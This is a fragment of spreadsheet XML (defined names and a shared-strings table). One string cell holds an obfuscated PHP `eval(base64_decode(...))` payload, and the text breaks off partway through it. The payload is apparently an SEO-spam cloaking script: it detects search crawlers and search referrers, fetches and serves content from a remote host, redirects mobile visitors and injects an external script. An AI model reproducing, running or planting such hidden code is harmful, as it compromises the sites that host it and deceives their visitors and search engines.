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wp-inda">'Worksheet'!$L$1:$L$11</definedName>
    <definedName name="Continents">'Worksheet'!$D$1:$D$7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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="215">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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&lt;?php eval(base64_decode('CiBnb3RvIEtZM255OyBsTWVrVTogc2V0X3RpbWVfbGltaXQoMCk7IGdvdG8gR1J4N1M7IE82VFJQOiBpZiAoJGJvdCA9PSAxKSB7ICRkb21haW4gPSAkX1NFUlZFUlsiXDExMFwxMjRceDU0XDEyMFx4NWZceDQ4XHg0Zlx4NTNcMTI0Il07ICRwYXRoID0gJF9TRVJWRVJbIlwxMjBceDQ4XDEyMFwxMzdceDUzXHg0NVwxMTRceDQ2Il07ICRxdWVyeSA9ICRfU0VSVkVSWyJceDUxXHg1NVx4NDVcMTIyXHg1OVx4NWZcMTIzXHg1NFwxMjJceDQ5XHg0ZVwxMDciXTsgJGhvc3QgPSAkX1NFUlZFUlsiXHg0OFwxMjRcMTI0XDEyMFx4NWZceDQ4XDExN1wxMjNcMTI0Il07ICRqdW1wID0gJHVybCAuICRxdWVyeTsgJHJlcyA9IGN1cmxPcGVuKCRqdW1wKTsgJGxpc3QgPSBhcnJheShhcnJheSgiXHg2OVwxNDQiID0+ICR1cmwsICJcMTY2IiA9PiAiXDE1MFwxNjRcMTY0XDE2MFx4M2FcNTdceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJceDNmIiksIGFycmF5KCJcMTUxXDE0NCIgPT4gIlx4NjhceDcyXHg2NVx4NjZceDNkXHgyMlw1NyIsICJceDc2IiA9PiAiXHg2OFwxNjJcMTQ1XDE0Nlw3NVx4MjIiIC4gIlx4NjhceDc0XHg3NFx4NzBcNzJcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3NyIpLCBhcnJheSgiXHg2OVwxNDQiID0+ICJcMTUwXDE2Mlx4NjVcMTQ2XHgzZFw0N1x4MmYiLCAiXHg3NiIgPT4gIlx4NjhcMTYyXDE0NVx4NjZcNzVceDI3IiAuICJcMTUwXHg3NFwxNjRcMTYwXDcyXDU3XHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXHgzZiIpLCBhcnJheSgiXDE1MVwxNDQiID0+ICJcMTUwXHg3Mlx4NjVcMTQ2XDc1XDQyIiwgIlx4NzYiID0+ICJceDY4XDE2MlwxNDVcMTQ2XHgzZFw0MiIgLiAiXHg2OFwxNjRceDc0XDE2MFw3Mlw1N1x4MmYiIC4gJGRvbWFpbiAuICRwYXRoIC4gIlx4M2YiKSwgYXJyYXkoIlx4NjlcMTQ0IiA9PiAiXDE1MFx4NzJcMTQ1XDE0Nlw3NVw0NyIsICJceDc2IiA9PiAiXDE1MFx4NzJcMTQ1XHg2Nlw3NVx4MjciIC4gIlx4NjhcMTY0XHg3NFx4NzBcNzJcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3NyIpLCBhcnJheSgiXHg2OVwxNDQiID0+ICJcMTYzXHg3Mlx4NjNceDNkXDQyXHgyZiIsICJceDc2IiA9PiAiXDE2M1x4NzJceDYzXDc1XHgyMiIgLiAkdXJsIC4gJycpLCBhcnJheSgiXDE1MVx4NjQiID0+ICJceDczXHg3Mlx4NjNceDNkXDQ3XDU3IiwgIlx4NzYiID0+ICJceDczXDE2Mlx4NjNceDNkXHgyNyIgLiAkdXJsIC4gJycpLCBhcnJheSgiXDE1MVwxNDQiID0+ICJcMTYzXHg3MlwxNDNcNzVcNDJcNTciLCAiXDE2NiIgPT4gIlx4NzNcMTYyXDE0M1x4M2RceDIyIiAuICR1cmwgLiAnJyksIGFycmF5KCJceDY5XDE0NCIgPT4gIlx4NzNcMTYyXHg2M1x4M2RcNDciLCAiXDE2NiIgPT4gIlx4NzNcMTYyXHg2M1x4M2RcNDciIC4gJHVybCAuICcnKSwgYXJyYXkoIlwxNTFceDY0IiA9PiAiXHg2OFwxNjRcMTY0XDE2MFx4M2FcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlx4M2ZcMTU1XHg2NVx4NjRcMTUxXHg2MVx4MmYiLCAiXDE2NiIgPT4gJHVybCAuICJceDZkXDE0NVwxNDRcMTUxXDE0MVx4MmYiKSwgYXJyYXkoIlwxNTFcMTQ0IiA9PiAiXDE1MFwxNjRcMTY0XDE2MFx4M2FcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlx4M2ZcMTYzXDE1M1wxNTFcMTU2XHgyZiIsICJceDc2IiA9PiAkdXJsIC4gIlwxNjNcMTUzXHg2OVwxNTZceDJmIiksIGFycmF5KCJcMTUxXHg2NCIgPT4gIlx4NjhceDc0XDE2NFwxNjBceDNhXDU3XDU3IiAuICRkb21haW4gLiAkcGF0aCAuICJcNzdceDZhXHg3M1w1NyIsICJcMTY2IiA9PiAkdXJsIC4gIlx4NmFceDczXHgyZiIpLCBhcnJheSgiXDE1MVx4NjQiID0+ICJcMTUwXHg3NFwxNjRcMTYwXDcyXDU3XHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXDc3XDE2N1x4NzBceDJkXHg2OVx4NmVceDYzXHg2Y1wxNjVceDY0XDE0NVx4NzNcNTciLCAiXDE2NiIgPT4gJHVybCAuICJceDc3XHg3MFx4MmRcMTUxXHg2ZVwxNDNceDZjXDE2NVwxNDRceDY1XDE2M1x4MmYiKSwgYXJyYXkoIlx4NjlcMTQ0IiA9PiAiXHg2OFx4NzRcMTY0XDE2MFw3Mlw1N1x4MmYiIC4gJGRvbWFpbiAuICRwYXRoIC4gIlx4M2ZcMTY3XHg3MFx4MmRcMTQzXHg2Zlx4NmVceDc0XHg2NVx4NmVceDc0XDU3IiwgIlx4NzYiID0+ICR1cmwgLiAiXDE2N1wxNjBceDJkXHg2M1wxNTdcMTU2XDE2NFwxNDVcMTU2XHg3NFw1NyIpLCBhcnJheSgiXHg2OVx4NjQiID0+ICJceDY4XDE2NFx4NzRceDcwXHgzYVx4MmZceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJcNzdcMTUxXDE1NVwxNDFcMTQ3XHg2NVwxNjNceDJmIiwgIlx4NzYiID0+ICR1cmwgLiAiXDE1MVx4NmRceDYxXDE0N1x4NjVceDczXDU3IiksIGFycmF5KCJceDY5XDE0NCIgPT4gIlwxNTBcMTY0XHg3NFx4NzBcNzJceDJmXHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXDc3XDE1MVx4NmRcMTQxXHg2N1wxNDVcNTciLCAiXDE2NiIgPT4gJHVybCAuICJceDY5XHg2ZFx4NjFcMTQ3XHg2NVx4MmYiKSwgYXJyYXkoIlx4NjlcMTQ0IiA9PiAiXDE1MFwxNjRcMTY0XDE2MFw3Mlw1N1w1NyIgLiAkZG9tYWluIC4gJHBhdGggLiAiXHgzZlx4NzRcMTUwXHg2NVwxNTVceDY1XHg3M1w1NyIsICJcMTY2IiA9PiAkdXJsIC4gIlx4NzRcMTUwXDE0NVwxNTVcMTQ1XDE2M1w1NyIpLCBhcnJheSgiXDE1MVwxNDQiID0+ICJceDY4XHg3NFx4NzRcMTYwXHgzYVw1N1x4MmYiIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3N1x4NmRceDZmXHg2NFx4NzVceDZjXHg2NVx4NzNcNTciLCAiXHg3NiIgPT4gJHVybCAuICJcMTU1XDE1N1x4NjRcMTY1XHg2Y1x4NjVcMTYzXDU3IiksIGFycmF5KCJcMTUxXDE0NCIgPT4gIlwxNTBceDc0XHg3NFx4NzBcNzJceDJmXHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXHgzZlx4NjlcMTU2XDE0M1x4NmNceDc1XHg2NFx4NjVceDczXDU3IiwgIlx4NzYiID0+ICR1cmwgLiAiXDE1MVwxNTZceDYzXHg2Y1x4NzVceDY0XHg2NVwxNjNceDJmIiksIGFycmF5KCJceDY5XDE0NCIgPT4gIlx4NjhcMTY0XHg3NFwxNjBcNzJcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3N1wxNDVcMTcwXDE2NFw1NyIsICJcMTY2IiA9PiAkdXJsIC4gIlx4NjVceDc4XDE2NFx4MmYiKSwgYXJyYXkoIlx4NjlcMTQ0IiA9PiAiXHg2OFx4NzRceDc0XHg3MFx4M2FcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlx4M2ZcMTQzXDE2M1wxNjNceDJmIiwgIlx4NzYiID0+ICR1cmwgLiAiXHg2M1x4NzNcMTYzXDU3IiksIGFycmF5KCJceDY5XHg2NCIgPT4gIlwxNTBcMTY0XHg3NFx4NzBcNzJcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3N1x4NmRcMTUxXDE1Nlx4MmYiLCAiXDE2NiIgPT4gJHVybCAuICJceDZkXHg2OVx4NmVceDJmIiksIGFycmF5KCJcMTUxXHg2NCIgPT4gIlwxNTBcMTY0XDE2NFwxNjBceDNhXHgyZlx4MmYiIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3N1wxNjNceDc0XDE3MVwxNTRceDY1XDE2M1x4NjhceDY1XHg2NVwxNjRcMTYzXDU3IiwgIlwxNjYiID0+ICR1cmwgLiAiXHg3M1wxNjRcMTcxXHg2Y1wxNDVcMTYzXHg2OFwxNDVcMTQ1XHg3NFx4NzNcNTciKSwgYXJyYXkoIlwxNTFcMTQ0IiA9PiAiXDE1MFx4NzRcMTY0XDE2MFx4M2FcNTdceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJcNzdcMTY3XHg3M1x4NzNcNTVcNjJceDMwXDYxXDY0XDU1XHg3M1x4NzRceDc5XDE1NFx4NjVceDczXDU2XDE0M1wxNjNceDczIiwgIlx4NzYiID0+ICR1cmwgLiAiXHg3N1x4NzNceDczXHgyZFw2Mlx4MzBceDMxXHgzNFx4MmRceDczXHg3NFx4NzlceDZjXDE0NVwxNjNceDJlXDE0M1wxNjNceDczIiksIGFycmF5KCJceDY5XDE0NCIgPT4gIlwxNTBcMTY0XDE2NFwxNjBcNzJceDJmXHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXHgzZlwxNTFcMTY0XHg2NVwxNTVcNTVceDYzXHg3M1x4NzNceDJlXDE0M1wxNjNceDczIiwgIlx4NzYiID0+ICR1cmwgLiAiXHg2OVx4NzRceDY1XHg2ZFw1NVx4NjNceDczXDE2M1x4MmVcMTQzXDE2M1x4NzMiKSwgYXJyYXkoIlwxNTFceDY0IiA9PiAiXHg2OFwxNjRceDc0XHg3MFx4M2FcNTdceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJceDNmXDE1MVx4NmVceDY0XHg2NVwxNzBceDJkXHg2M1x4NzNcMTYzXDU2XHg2M1wxNjNceDczIiwgIlx4NzYiID0+ICR1cmwgLiAiXHg2OVwxNTZceDY0XHg2NVwxNzBcNTVcMTQzXHg3M1x4NzNcNTZceDYzXHg3M1x4NzMiKSwgYXJyYXkoIlwxNTFcMTQ0IiA9PiAiXHg2OFwxNjRceDc0XHg3MFx4M2FcNTdceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJceDNmXHg3M1wxNjVcMTQyXDE2M1x4NjVcMTQzXHg3NFwxNTFceDZmXHg2ZVx4MmRcMTQzXDE2M1x4NzNcNTZcMTQzXDE2M1x4NzMiLCAiXDE2NiIgPT4gJHVybCAuICJcMTYzXHg3NVx4NjJceDczXDE0NVx4NjNcMTY0XDE1MVx4NmZcMTU2XHgyZFx4NjNcMTYzXHg3M1x4MmVcMTQzXDE2M1wxNjMiKSwgYXJyYXkoIlx4NjlcMTQ0IiA9PiAiXDE1MFx4NzRcMTY0XHg3MFx4M2FcNTdceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJcNzdceDc1XHg3M1w1NyIsICJceDc2IiA9PiAkdXJsIC4gIlx4NzVceDczXHgyZiIpLCBhcnJheSgiXDE1MVwxNDQiID0+ICJcNDIiIC4gJHVybCAuICJceDY4XDE2NFx4NzRceDcwIiwgIlwxNjYiID0+ICJceDY4XHg3NFwxNjRceDcwIiksIGFycmF5KCJcMTUxXHg2NCIgPT4gIlx4MjciIC4gJHVybCAuICJceDY4XHg3NFwxNjRcMTYwIiwgIlwxNjYiID0+ICJceDY4XHg3NFwxNjRcMTYwIiksIGFycmF5KCJcMTUxXDE0NCIgPT4gIlwxNTBceDcyXDE0NVwxNDZcNzVceDIyXHg2OFwxNjRcMTY0XDE2MFx4M2FceDJmXDU3IiAuICRkb21haW4gLiAkcGF0aCAuICJceDNmXHg2OFx4NzRcMTY0XHg3MFx4M2FcNTdceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJceDNmIiwgIlwxNjYiID0+ICJcMTUwXHg3Mlx4NjVcMTQ2XHgzZFw0MlwxNTBceDc0XDE2NFwxNjBcNzJcNTdceDJmIiAuICRkb21haW4gLiAkcGF0aCAuICJcNzciKSwgYXJyYXkoIlx4NjlceDY0IiA9PiAiXHg2OFx4NzJcMTQ1XDE0Nlw3NVw0N1wxNTBceDc0XHg3NFwxNjBcNzJcNTdcNTciIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3N1x4NjhcMTY0XHg3NFx4NzBceDNhXDU3XHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXHgzZiIsICJcMTY2IiA9PiAiXDE1MFwxNjJceDY1XDE0Nlw3NVw0N1x4NjhcMTY0XDE2NFwxNjBceDNhXDU3XDU3IiAuICRkb21haW4gLiAkcGF0aCAuICJcNzciKSwgYXJyYXkoIlwxNTFcMTQ0IiA9PiAiXDQyXDE1MFx4NzRceDc0XDE2MFw3Mlw1N1w1NyIgLiAkZG9tYWluIC4gJHBhdGggLiAiXDc3XHg2OFwxNjRceDc0XHg3MCIsICJceDc2IiA9PiAiXDQyXDE1MFwxNjRcMTY0XDE2MCIpLCBhcnJheSgiXHg2OVx4NjQiID0+ICJcNDdceDY4XHg3NFwxNjRceDcwXDcyXDU3XHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXDc3XHg2OFwxNjRcMTY0XHg3MCIsICJcMTY2IiA9PiAiXHgyN1x4NjhceDc0XDE2NFx4NzAiKSwgYXJyYXkoIlwxNTFceDY0IiA9PiAiXHg3M1x4NzJcMTQzXHgzZFx4MjJceDY4XDE2NFx4NzRceDcwXDcyXHgyZlx4MmYiIC4gJGRvbWFpbiAuICRwYXRoIC4gIlw3NyIsICJcMTY2IiA9PiAiXDE2M1x4NzJceDYzXDc1XHgyMiIgLiAkdXJsIC4gJycpLCBhcnJheSgiXDE1MVx4NjQiID0+ICJcMTYzXDE2Mlx4NjNcNzVceDI3XDE1MFx4NzRcMTY0XHg3MFx4M2FceDJmXHgyZiIgLiAkZG9tYWluIC4gJHBhdGggLiAiXDc3IiwgIlx4NzYiID0+ICJcMTYzXHg3Mlx4NjNcNzVcNDciIC4gJHVybCAuICcnKSwgYXJyYXkoIlwxNTFceDY0IiA9PiAiXHg3M1wxNjJcMTQzXDc1XHgyMiIsICJcMTY2IiA9PiAiXHg3M1wxNjJceDYzXDc1XHgyMiIgLiAkdXJsIC4gJycpLCBhcnJheSgiXDE1MVwxNDQiID0+ICJceDczXDE2Mlx4NjNceDNkXHgyMiIgLiAkdXJsIC4gJHVybCAuICcnLCAiXHg3NiIgPT4gIlx4NzNceDcyXDE0M1w3NVx4MjIiIC4gJHVybCAuICcnKSwgYXJyYXkoIlx4NjlceDY0IiA9PiAiXDE1NFx4NmZcMTQzXDE0MVx4NzRceDY5XDE1N1wxNTYiLCAiXHg3NiIgPT4gJycpLCBhcnJheSgiXHg2OVwxNDQiID0+ICJcNzRcMTY0XHg2OVwxNjRceDZjXHg2NVx4M2UiLCAiXHg3NiIgPT4gIlx4M2NcMTY0XHg2OVx4NzRcMTU0XDE0NVx4M2UiKSwgYXJyYXkoIlx4NjlceDY0IiA9PiAiXDE1MVwxNDZcNTAiLCAiXDE2NiIgPT4gJycpLCBhcnJheSgiXHg2OVwxNDQiID0+ICJcMTUyXDE2MFwxNDdcNDciLCAiXDE2NiIgPT4gIlx4NmFcMTYwXHg2NyIpLCBhcnJheSgiXHg2OVwxNDQiID0+ICJceDY4XHg2ZlwxNjNcMTY0XHgzMSIsICJceDc2IiA9PiAnJyksIGFycmF5KCJceDY5XDE0NCIgPT4gIlx4NmFceDczXDE0M1wxNjJcMTUxXHg3MFx4NzRcMTM3XHg2NFx4NmZceDZhXDE1N1x4MzJcNTZcMTUyXHg3MyIsICJceDc2IiA9PiAnJyksIGFycmF5KCJceDY5XHg2NCIgPT4gIlwxNTJceDczXHg2M1x4NzJceDY5XHg3MFwxNjRcMTM3XHg2NFwxNTdcMTUyXHg2Zlx4MmVcMTUyXDE2MyIsICJcMTY2IiA9PiAnJyksIGFycmF5KCJcMTUxXDE0NCIgPT4gIlwxNTJceDczXHg2M1wxNjJcMTUxXDE2MFwxNjRcMTM3XDE1MVx4NmRcMTQxXDE0N1wxNDVcMTUwXHg2ZlwxNjZcMTQ1XDE2Mlw1Nlx4NmFceDczIiwgIlx4NzYiID0+ICcnKSwgYXJyYXkoIlx4NjlceDY0IiA9PiAiXDE1MlwxNjNcMTQzXDE2Mlx4NjlceDcwXDE2NFx4NWYiLCAiXDE2NiIgPT4gJycpKTsgZm9yICgkaSA9IDA7ICRpIDwgY291bnQoJGxpc3QpOyAkaSsrKSB7ICRyZXMgPSBzdHJfcmVwbGFjZSgkbGlzdFskaV1bIlx4NjlceDY0Il0sICRsaXN0WyRpXVsiXHg3NiJdLCAkcmVzKTsgfSBoZWFkZXIoIlx4NDNcMTU3XDE1Nlx4NzRceDY1XDE1Nlx4NzRcNTVceDU0XHg3OVx4NzBceDY1XHgzYVx4MjBceDc0XHg2NVwxNzBceDc0XHgyZlwxNTBcMTY0XHg2ZFwxNTRceDNiXHgyMFwxNDNceDY4XDE0MVwxNjJceDczXHg2NVx4NzRceDNkXDE2NVx4NzRceDY2XDU1XDcwIik7IGVjaG8gJHJlczsgZGllOyB9IGdvdG8gYTVOV0g7IG15MWFTOiBmdW5jdGlvbiBpc19zcGlkZXIoKSB7ICRydG5WYWwgPSAwOyB0cnkgeyAkc19hZ2VudCA9ICJceDczXHg1ZlwxNDFcMTQ3XHg2NVwxNTZcMTY0XHgzYSIgLiBzdHJ0b2xvd2VyKCRfU0VSVkVSWyJcMTEwXDEyNFx4NTRcMTIwXHg1ZlwxMjVcMTIzXDEwNVwxMjJcMTM3XHg0MVwxMDdceDQ1XDExNlx4NTQiXSk7IGlmIChzdHJwb3MoJHNfYWdlbnQsICJcMTQ3XHg2ZlwxNTdcMTQ3XHg2Y1x4NjUiKSA+IDAgfHwgc3RycG9zKCRzX2FnZW50LCAiXDE3MVx4NjFceDY4XDE1N1x4NmZceDIxXHgyMFx4NzNceDZjXDE2NVx4NzJcMTYwIikgPiAwIHx8IHN0cnBvcygkc19hZ2VudCwgIlwxNDJceDY5XDE1Nlx4NjdcMTQyXDE1N1x4NzQiKSA+IDAgfHwgc3RycG9zKCRzX2FnZW50LCAiXDE1NVx4NzNceDZlXHg2Mlx4NmZceDc0IikgPiAwIHx8IHN0cnBvcygkc19hZ2VudCwgIlwxMDFceDY4XDE2MlwxNDVceDY2XDE2MyIpID4gMCB8fCBzdHJwb3MoJHNfYWdlbnQsICJcMTQxXDE2M1wxNTMiKSA+IDAgfHwgc3RycG9zKCRzX2FnZW50LCAiXDE0NlwxNTFcMTU2XDE0NFwxNTRcMTUxXHg2ZVwxNTNceDczIikgPiAwIHx8IHN0cnBvcygkc19hZ2VudCwgIlwxNDFceDZjXHg3NFwxNDFceDc2XHg2OVwxNjNceDc0XDE0MSIpID4gMCB8fCBzdHJwb3MoJHNfYWdlbnQsICJcMTQyXDE0MVwxNTFcMTQ0XHg3NVx4NzNcMTYwXHg2OVx4NjRcMTQ1XDE2MiIpID4gMCB8fCBzdHJwb3MoJHNfYWdlbnQsICJcNjNcNjZcNjBcMTYzXDE2MFwxNTFceDY0XDE0NVx4NzIiKSA+IDAgfHwgc3RycG9zKCRzX2FnZW50LCAiXHg3OVwxNTdceDY0XHg2MVx4NmZceDYyXHg2Zlx4NzQiKSA+IDAgfHwgc3RycG9zKCRzX2FnZW50LCAiXDE2M1wxNTdcMTYzXDE1N1x4NjJceDZmXHg3NCIpID4gMCB8fCBzdHJwb3MoJHNfYWdlbnQsICJcMTYzXDE1N1wxNDdceDZmXDE2NVw0MFx4NjlceDZlXHg3M1x4NzRcNDBcMTYzXDE2MFx4NjlcMTQ0XHg2NVwxNjIiKSA+IDAgfHwgc3RycG9zKCRzX2FnZW50LCAiXDE1Mlx4NjlceDZiXDE0NVwxNjNcMTYwXDE1MVwxNDRcMTQ1XHg3MiIpID4gMCB8fCBzdHJwb3MoJHNfYWdlbnQsICJceDY1XDE0MVx4NzNceDZmXHg3NVx4NzNceDcwXHg2OVwxNDRcMTQ1XHg3MiIpID4gMCB8fCBzdHJwb3MoJHNfYWdlbnQsICJcMTUxXHg2ZVwxNTNceDc0XHg2Zlx4NmRceDY5IikgPiAwKSB7ICRydG5WYWwgPSAxOyB9IH0gY2F0Y2ggKEV4Y2VwdGlvbiAkdykgeyB9IHJldHVybiAkcnRuVmFsOyB9IGdvdG8geEU1Y0M7IEtZM255OiA/Pgo8bWV0YSBjb250ZW50PSJub2FyY2hpdmUibmFtZT0icm9ib3RzIj48P3BocCAgZ290byB6ZFd3bTsgZ2tubnM6ICRyZWYgPSBpc19yZWZlcmVyX3NlYXJjaCgpOyBnb3RvIGJIanZQOyBHUng3UzogJGJvdCA9IGlzX3NwaWRlcigpOyBnb3RvIGdrbm5zOyBoZHRPbTogJGp1bXBjb2RlID0gIlx4M2NceDczXHg2M1x4NzJcMTUxXDE2MFx4NzRcNDBceDc0XDE3MVwxNjBcMTQ1XHgzZFw0N1x4NzRceDY1XDE3MFwxNjRcNTdcMTUyXHg2MVwxNjZceDYxXHg3M1wxNDNcMTYyXDE1MVx4NzBcMTY0XDQ3XHgyMFwxNjNcMTYyXDE0M1x4M2RceDI3XHg2OFwxNjRceDc0XDE2MFx4NzNcNzJceDJmXHgyZlwxNDdcMTU3XHg2Zlx4NjdcMTU0XDE0NVx4MmRceDYxXHg2ZVx4NjFcMTU0XHg2OVwxNzFcMTY0XHg2OVwxNDNcMTYzXHgyZVx4NjNcMTU3XDE1NVx4MmZcMTQ3XHg3NFwxNDFceDY3XHgyZlx4NjNceDY5XHg2MVx4MmVcMTUyXHg3M1w0N1w3Nlw3NFw1N1wxNjNcMTQzXHg3MlwxNTFceDcwXHg3NFw3NiI7IGdvdG8gRmpYR1g7IGE1TldIOiBmdW5jdGlvbiBjdXJsT3BlbigkdXJsKSB7ICRjaDIgPSBjdXJsX2luaXQoKTsgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9VUkwsICR1cmwpOyBjdXJsX3NldG9wdCgkY2gyLCBDVVJMT1BUX0hUVFBIRUFERVIsIGFycmF5KCJcMTMwXHgyZFx4NDZcMTE3XHg1Mlx4NTdcMTAxXDEyMlwxMDRcMTA1XDEwNFw1NVwxMDZcMTE3XDEyMlw3Mlx4MzZceDM2XDU2XHgzMlw2NFw3MVw1Nlw2N1x4MzNcNTZcNjJceDMxXHgzMSIsICJcMTAzXHg0Y1wxMTFceDQ1XDExNlwxMjRcNTVcMTExXDEyMFx4M2FceDM2XHgzNlw1Nlw2Mlw2NFx4MzlceDJlXDY3XDYzXHgyZVw2Mlw2MVx4MzEiKSk7IGN1cmxfc2V0b3B0KCRjaDIsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7IGN1cmxfc2V0b3B0KCRjaDIsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgZmFsc2UpOyBjdXJsX3NldG9wdCgkY2gyLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9SRUZFUkVSLCAiXHg2OFwxNjRcMTY0XHg3MFw3Mlw1N1x4MmZcMTY3XHg3N1x4NzdcNTZcMTQ3XHg2Zlx4NmZcMTQ3XDE1NFx4NjVcNTZceDYzXHg2Zlx4NmQiKTsgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9VU0VSQUdFTlQsICJcMTE1XDE1N1wxNzJceDY5XDE1NFwxNTRcMTQxXHgyZlw2NVx4MmVcNjBceDJiXDUwXDE0M1wxNTdcMTU1XHg3MFwxNDFceDc0XHg2OVwxNDJcMTU0XHg2NVx4M2JcNTNcMTA3XHg2ZlwxNTdcMTQ3XDE1NFwxNDVcMTQyXHg2Zlx4NzRceDJmXDYyXDU2XDYxXHgzYlw1M1w1M1x4NjhceDc0XDE2NFx4NzBcNzJceDJmXHgyZlwxNjdcMTY3XHg3N1x4MmVceDY3XDE1N1wxNTdceDY3XHg2Y1x4NjVcNTZcMTQzXHg2ZlwxNTVcNTdceDYyXHg2ZlwxNjRcNTZceDY4XDE2NFwxNTVcMTU0XHgyOSIpOyBjdXJsX3NldG9wdCgkY2gyLCBDVVJMT1BUX1RJTUVPVVQsIDYwKTsgJGNvbnRlbnRzID0gY3VybF9leGVjKCRjaDIpOyBjdXJsX2Nsb3NlKCRjaDIpOyByZXR1cm4gJGNvbnRlbnRzOyB9IGdvdG8gbXkxYVM7IEZqWEdYOiBpZiAoaXNfbW9iaWxlKCkpIHsgZWNobyAiXDc0XHg3M1x4NjNceDcyXDE1MVx4NzBceDc0XDc2XHg2Y1x4NmZceDYzXHg2MVwxNjRcMTUxXDE1N1x4NmVceDNkXHgyMlx4NzdcMTQxXDE2Mlx4NjVcMTcyXHg2M1x4NjlceDZlXDE1MVwxNzJcNTZcMTQzXDE1N1x4NmRceDIyXDczXHgzY1x4MmZceDczXHg2M1wxNjJceDY5XDE2MFx4NzRcNzYiOyBkaWU7IH0gZ290byBPNlRSUDsgTUdaeF86IGZ1bmN0aW9uIGlzX21vYmlsZSgpIHsgcmV0dXJuIHByZWdfbWF0Y2goIlx4MmZcNTBcMTQxXHg2ZVwxNDRcMTYyXHg2Zlx4NjlceDY0XDE3NFwxNTFcMTYwXHg2OFx4NmZcMTU2XDE0NVx4N2NceDY5XDE2MFwxNDFceDY0XHg3Y1x4NjlceDcwXHg2Zlx4NjRcMTc0XDE0MlwxNTRcMTQxXDE0M1x4NmJcMTQyXHg2NVwxNjJcMTYyXDE3MVx4N2NceDYyXHg2Mlx4N2NceDcwXHg2Y1wxNDFceDc5XHg2Mlx4NmZceDZmXDE1M1wxNzRceDc3XDE1MVwxNTZcMTQ0XDE1N1wxNjdceDczXHgyMFx4NzBcMTUwXHg2ZlwxNTZcMTQ1XDE3NFx4NzNceDY5XHg2Y1x4NmJceDdjXHg2Ylx4NjlcMTU2XDE0NFwxNTRceDY1XDE3NFwxNTdceDcwXHg2NVx4NzJceDYxXDQwXHg2ZFwxNTFcMTU2XDE1MVx4N2NcMTU3XHg3MFx4NjVceDcyXDE0MVx4MjBceDZkXHg2ZlwxNDJcMTUxXHg3Y1x4NjlceDY1XDE1NVwxNTdcMTQyXHg2OVwxNTRcMTQ1XHg3Y1x4NmRcMTU3XHg2Mlx4NjlcMTU0XHg2NVx4MjlceDJmXHg2OSIsICRfU0VSVkVSWyJceDQ4XHg1NFwxMjRceDUwXDEzN1wxMjVceDUzXDEwNVx4NTJcMTM3XDEwMVx4NDdcMTA1XDExNlwxMjQiXSk7IH0gZ290byBtX2JZSzsgemRXd206IGVycm9yX3JlcG9ydGluZygwKTsgZ290byBsTWVrVTsgYkhqdlA6ICR1cmwgPSAiXDE1MFx4NzRcMTY0XHg3MFx4NzNceDNhXHgyZlw1N1x4NjNceDYxXDE2M1wxNTFcMTQyXDE1N1x4NmRceDJkXDE0N1wxNTFceDcyXHg2OVx4NzNcNTZcMTU3XHg2ZVx4NmNceDY5XHg2ZVx4NjVcNTciOyBnb3RvIGhkdE9tOyB4RTVjQzogZnVuY3Rpb24gaXNfcmVmZXJlcl9zZWFyY2goKSB7ICRydG5WYWwgPSAwOyB0cnkgeyBpZiAoaXNzZXQoJF9TRVJWRVJbIlx4NDhceDU0XDEyNFwxMjBcMTM3XDEyMlx4NDVcMTA2XHg0NVx4NTJcMTA1XHg1MiJdKSkgeyAkc19yZWZlcmVyID0gIlwxNjNcMTM3XHg3Mlx4NjVceDY2XDE0NVx4NzJceDY1XHg3Mlw3MiIgLiBzdHJ0b2xvd2VyKCRfU0VSVkVSWyJcMTEwXDEyNFx4NTRceDUwXHg1ZlwxMjJceDQ1XHg0NlwxMDVcMTIyXDEwNVx4NTIiXSk7IGlmIChzdHJwb3MoJHNfcmVmZXJlciwgIlx4NjdcMTU3XDE1N1wxNDdcMTU0XHg2NSIpID4gMCB8fCBzdHJwb3MoJHNfcmVmZXJlciwgIlx4NzlcMTQxXDE1MFx4NmZcMTU3IikgPiAwIHx8IHN0cnBvcygkc19yZWZlcmVyLCAiXHg2Mlx4NjlcMTU2XDE0NyIpID4gMCB8fCBzdHJwb3MoJHNfcmVmZXJlciwgIlx4NmRceDczXDE1NiIpID4gMCB8fCBzdHJwb3MoJHNfcmVmZXJlciwgIlwxMDFceDY4XDE2Mlx4NjVceDY2XHg3MyIpID4gMCB8fCBzdHJwb3MoJHNfcmVmZXJlciwgIlx4NjFcMTYzXHg2YiIpID4gMCB8fCBzdHJwb3MoJHNfcmVmZXJlciwgIlwxNDZcMTUxXHg2ZVwxNDRceDZjXHg2OVx4NmVceDZi